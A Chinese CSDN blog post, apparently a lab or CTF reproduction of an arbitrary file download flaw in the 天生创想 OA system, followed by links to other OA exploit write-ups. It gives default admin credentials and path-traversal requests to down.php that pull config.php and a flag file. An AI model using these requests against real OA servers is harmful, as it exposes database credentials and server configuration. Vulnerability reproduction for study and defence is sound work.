天生创想OA系统任意文件下载漏洞

最新推荐文章于 2024-03-27 17:32:09 发布
最新推荐文章于 2024-03-27 17:32:09 发布
阅读量174 收藏
点赞数
分类专栏: web安全 # 文件下载、删除 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53303754/article/details/133849153
版权

天生创想OA系统存在任意文件下载

天生创想OA办公系统为国内首家开源OA软件产商,采用领先的B/S架构、跨平台语言(php+mysql)等灵活应用,是中国用户群最广泛的OA软件之一,是中国开源OA办公软件知名公司。 天生创想OA系统存在任意文件下载,攻击者可利用此漏洞下载配置文件信息。严重者可导致数据库权限丢失。

1.访问页面

http://IP/login.php

使用phpoa/12345678登录后台
在这里插入图片描述

登陆成功
在这里插入图片描述

2.访问页面

http://IP/down.php?urls=data/…/config.php

即可直接下载到配置信息文件。下载到的文件内容如下:
在这里插入图片描述

证明漏洞存在。

3.访问页面

http://IP/down.php?urls=data/…/flag.txt

即可下得到flag

在这里插入图片描述

flag{this_is_flag}

Mamba-
关注
专栏目录
漏洞复现】天OA存在任意文件上传漏洞
失心少年
09-08 961
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。第二步这里,我试了几次没有写成功,可能是post请求body部分哪里没有搞对,有兴趣的可以试一试,成功了告诉我。
联达动力OA 多处任意文件上传漏洞复现
最新发布
0xSec
04-04 608
联达动力OA /FileManage/UpLoadFile.aspx、/Hosp_Portal/uploadLogo.aspx、/Dept_Portal/uploadImg.aspx等接口处存在未授权文件上传漏洞,未经身份验证的攻击者可利用该漏洞获取服务器控制权限。
天生创想OA软件解读
06-27 188
天生创想OA软件!专业oa办公软件开源服务提供商,采用php+mysql开源语言,一直致力于应用管理软件基层研发,现己推出企业、政府、集团、saas等应用平台!而且,天生创想oa企业运营管理平台还能通过增减功能模块,让购买系统的价格进行调整,来满足不同企业的办公需求 1、天生创想oa 成熟度...
通达oa php漏洞,通达OA系统傻逼上传漏洞分析,可以直接getshell附EXP
weixin_39796149的博客
03-10 924
通达oa是一个不错的OA系统,但是这个不错的OA系统,却有一个傻逼上传漏洞,再加上apache的那个奇葩解析漏洞,我靠,简直天作之合啊。下面做一个分析,可以直接getshell附EXP漏洞的具体版本不太清楚,各位就当是一个学习吧。漏洞文件在:在general/vmeet/ 下的 privateUpload.php文件include_once( "inc/conn.php" ); //包含conn....
漏洞复现】联达OA UpLoadFile.aspx 存在任意文件上传漏洞
https://blog.echo234.cn/
03-27 500
联达动力oaPHPOA推出的新一代OA系统,系统支持性好、安全、数据高速缓存化;支持100+应用自行安装与定义,应用表单自定义,支持应用无代码开发,支持多语言。该系统存在任意文件上传,攻击者可以上传任意文件控制服务器。
天生创想OA办公系统V2019开源版含CRM、项目管理、移动H5
03-21
天生创想OA办公系统是一款基于PHP开发的开源企业级协同办公解决方案,V2019开源版更是集成了CRM...而“tscxoa_open”这个文件很可能是该系统的源代码包,用户可以下载后进行安装和定制,打造属于自己的企业级OA系统
天生创想OA系统相关文档
04-22
天生创想OA使用敏捷的MVC开发框架,支持多种模块分布式开发,统一... 此压缩包包括天生创想OA手机(WAP)版产品说明书v3.0、天生创想OA软件ppt、天生创想OA(V2016版)产品说明书、天生创想OA手机(企业微信)版产品说明书
天生创想OA协同OA办公系统V2017 PalmOACollaborativeOffice.rar
09-29
5、开源软件:天生创想OA办公系统为国内首家全源代码开放的管理平台,模块化开发框架结构,让你不再修改官方的代码文件,就可以对功能代码进行重写。让你轻松享受二次开发带来的便捷的同时,不再为官方升级而担忧。...
天生创想OA办公系统t2012增强版 v2.0.20131008
04-02
天生创想OA办公系统t2012增强版 v2.0.20131008 ,该系统源码比较完整的,天生创想OA办公系统为国内首家开源OA软件产商,采用领先的B/S架构、跨平台语言(php+mysql)等灵活应用, 是中国用户群最广泛的OA软件之一,是开源...
天生创想OA协同网络办公系统V2017(免费版下载)
11-29
天生创想OA办公系统为国内首家全源代码开放的管理平台,模块化开发框架结构,让你不再修改官方的代码文件,就可以对功能代码进行重写。让你轻松享受二次开发带来的便捷的同时,不再为官方升级而担忧。 模块化集成 ...
PHPOA学习指南
01-05
phpoa学习指南文档,主要介绍phpoa开源项目的结构,执行流程。
PHPOA开源协同OA办公系统 v4.0
10-23
PHPOA办公系统是适用于中小型企业的通用型协同OA管理软件,融合了PHPOA长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制PHPOA使用敏捷MVC开发框架,支持多种模块分布式开发,统一布局,界面简洁不失严肃。其功能包含有个人办公、工作流、公文、人力资源、行政办公、档案、项目管理、知识库、在线交流、CRM系统等,含盖60多个功能点,适合于企业领域内若干规范和要求,构成高性能、高可用、高质量、底成本的信息化管理平台。PHPOA首开先河,将众多企业视为保密、加密的软件源代码进行开放。在目前的OA、CRM软件市场上,大多数企业的源代码是加密的,有极小部份企业把源代码开放最多为30%,而PHPOA一直以来以一种开放的思想,将基础源代码进行全开放,方便企业二次开发及维护。全新的MVC架构采用全球认可的最为先进的开放理念——OOP(面向对象),进行全新框架设计。框架结构更为清晰,代码更易于维护。模块化做为功能的开发形式,让扩展性得到保证,让你轻松享受二次开发带来的便捷的同时,不再为官方升级而担忧。跨平台支持多种服务器环境,支持
PHP168整站V4.0全功能版
10-08
PHP168整站V4.0全功能版
【新】通达OA前台反序列化漏洞分析
C20220511的博客
08-07 2182
通达OA作为历史上出现漏洞较多的OA,在经过多轮的迭代之后已经很少前台的RCE漏洞了。对应12系列未做过多测试,本文提到的所有漏洞在最新版的通达12.4中已修复,使用此漏洞造成的任何攻击影响均与本文作者无关。在上面的方法中会对传入的Cookie值进行签名校验,校验的方法是validateData,其中$this->cookieValidationKey是签名的key。继续跟踪loadCookies方法,在这个方法中会调用unserialize方法对传入的Cookie的值进行反序列化。
通达oa php漏洞,通达OA前台任意用户登录漏洞
weixin_42407606的博客
03-10 2725
本文由东塔网络安全学院学员---张同学 投稿。1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。2 影响版本通达OA < 11.5.200417版本通达OA 2017版本3 漏洞原理本次复现为2017版本,则重点分析该版本,但原...
webug4.0——上传漏洞
A_dmin的博客
09-11 1529
webug4.0——上传漏洞篇第十七关 文件上传(前端拦截)第十八关 文件上传(解析漏洞)第十九关 文件上传(畸形文件)第二十关 文件上传(截断上传)第二十一关 文件上传(htaccess) 说到底就是上传shell,各种方法绕过 第十七关 文件上传(前端拦截) 进入页面直接上传,发现只能传图片 查看源码: ok,直接使用bp抓包进行更改 先写入木马,保存为一个图片,抓包上传之后在进行更改: ...
浅谈PHPOA开源OA办公系统二次开发详解
weixin_34268843的博客
09-19 2997
PHPOA办公系统是适用于中小型企业的通用型协同OA管理软件,融合了PHPOA长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。支持多种服务器环境,支持 平台可运行在WINDOWS、 LIUNX 、UNIX等任何支持PHP+MYSQL服务器环境的主机、虚拟主机、VPS以及云主机。PHPOA办公系统为国内首家全源代码开放的管理平台,...
渗透分支写脚本_给小白的黑盒渗透测试作业——漏洞分析测试到安全加固建议...
weixin_39788986的博客
11-21 641
概述2016.12.22收到关于海洋网站及内网的的渗透测试项目,并对海洋CMS进行黑盒渗透测试。本次渗透测试对存在的漏洞进行了仔细的分析和测试,以了解该站点和对应的内网的安全程度,同时给出相应的安全加固建议。2 实验环境海洋CMS所在服务器为:图1IP地址为:外网:192.168.0.220 内网Vmnet3:192.168.80.111因为该报告是针对海洋CMS及内网中的渗透测试,所以把海洋CM...
服务器安全-阿里自研补丁列表整理
日拱一卒无有尽,功不唐捐终入海
08-29 9308
当前服务器安全补丁管理功能可检测和修复的漏洞如下(若有新的补丁将更新在这里): 补丁编号 路径 漏洞名称 漏洞描述 补丁研发时间 159 /src/library/ubb/PwSimpleUbbCode.php phpwind ubb标签属性xss
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值